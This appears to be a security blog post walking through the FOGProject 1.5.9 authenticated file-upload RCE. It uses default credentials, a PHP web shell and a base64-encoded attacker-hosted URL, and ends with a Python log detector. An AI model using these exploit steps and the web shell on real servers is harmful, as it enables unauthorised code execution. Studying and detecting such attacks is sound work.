Muzec's Cyber Security Blog

Hack. Sleep. Repeat


Hello guys, in this post I will be talking about the new FOGProject 1.5.9 - File Upload RCE (Authenticated), which was disclosed not too long ago, and I will be exploiting one instance as a proof of concept.

ExploitDB link: https://www.exploit-db.com/exploits/49811

We have the victim machine ready. Now let's log in with the FOGProject default credentials, which are fog and password, and we should have access to the dashboard.

Now time for the fun part. Going to the attacking machine, let's create an empty 10 MB file.

dd if=/dev/zero of=myshell bs=10485760 count=1

Now let's add our PHP payload to the end of the file we just created.

echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

Now we need to make our myshell file accessible over HTTP. I will be using SimpleHTTPServer for that, or you can simply copy myshell to your /var/www/html.

The server is running in the same folder where I have myshell. Now let's base64-encode the URL of the myshell file (replacing Attacker-IP with your own IP; here it is my IP, because the myshell file is hosted on my machine).

echo "http://Attacker-IP/myshell" | base64

Now let's visit the URL.

http://localhostfog//fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64

NOTE: the file parameter carries the myshell URL that we encoded in base64, aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=. The general form of the URL is:

http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<MYSHELL_URL_ENCODED_IN_BASE64_HERE>=&arch=arm64

Now change the Kernel Name (bzImage32) to myshell.php and click on Install. We should get "Download Started"; give it time and we should see "Transfer Succeeded".

Nice, our file has been uploaded. We can confirm it by checking the SimpleHTTPServer we started.

Now let's access our uploaded file through its URL to get remote code execution.

http://localhostfog/fog/service/ipxe/myshell.php?cmd=id

Boom, we have remote code execution. You can go ahead and get a reverse shell or do anything.
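Seen from the FOG server's side, both requests in this walkthrough land in the web server's access log. The script below is an added example (not part of the original post or the FOG project) that flags them in combined-format log lines. The trusted kernel host, the list of shipped iPXE scripts and the sample log lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions (adjust to your site): hosts FOG may fetch kernels from, and the
# PHP files a clean install ships in service/ipxe/.
TRUSTED_KERNEL_HOSTS = {"fogproject.org"}
KNOWN_IPXE_SCRIPTS = {"boot.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_file_param(value):
    """Return the URL carried in the base64 'file' parameter, or None."""
    value = value.replace(" ", "+")   # parse_qs turns '+' into ' '
    value += "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8").strip()
    except (binascii.Error, UnicodeDecodeError):
        return None

def check_line(line):
    """Return findings for one access-log line (combined log format)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    query = parse_qs(url.query)
    findings = []
    # Kernel-update request whose download source is not a trusted host.
    if query.get("node") == ["about"] and query.get("sub") == ["kernel"] and "file" in query:
        source = decode_file_param(query["file"][0])
        try:
            host = urlsplit(source).hostname if source else None
        except ValueError:
            host = None
        if host not in TRUSTED_KERNEL_HOSTS:
            findings.append(f"kernel source not trusted: {source!r}")
    # Request for a PHP file in the iPXE directory that FOG did not ship.
    ipxe = re.search(r"/service/ipxe/([^/]+\.php)$", url.path)
    if ipxe and ipxe.group(1) not in KNOWN_IPXE_SCRIPTS:
        findings.append(f"unknown script in ipxe directory: {ipxe.group(1)}")
    return findings

# Constructed sample lines; the IP is the one encoded in the URL above.
SAMPLE_LOG = [
    '10.8.0.156 - - [01/Jan/2021:10:00:00 +0000] "GET /fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzEwLjguMC4xNTYvbXlzaGVsbAo=&arch=arm64 HTTP/1.1" 200 512',
    '10.8.0.156 - - [01/Jan/2021:10:02:00 +0000] "GET /fog/service/ipxe/myshell.php?cmd=id HTTP/1.1" 200 54',
    '192.0.2.10 - - [01/Jan/2021:10:03:00 +0000] "GET /fog/service/ipxe/boot.php?mac=00:11:22:33:44:55 HTTP/1.1" 200 900',
]
```

Feeding each access-log line to `check_line` flags the first two sample lines and leaves the ordinary `boot.php` request alone. Changing the default fog / password credentials removes the authenticated access this walkthrough starts from.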

Greetings from Muzec


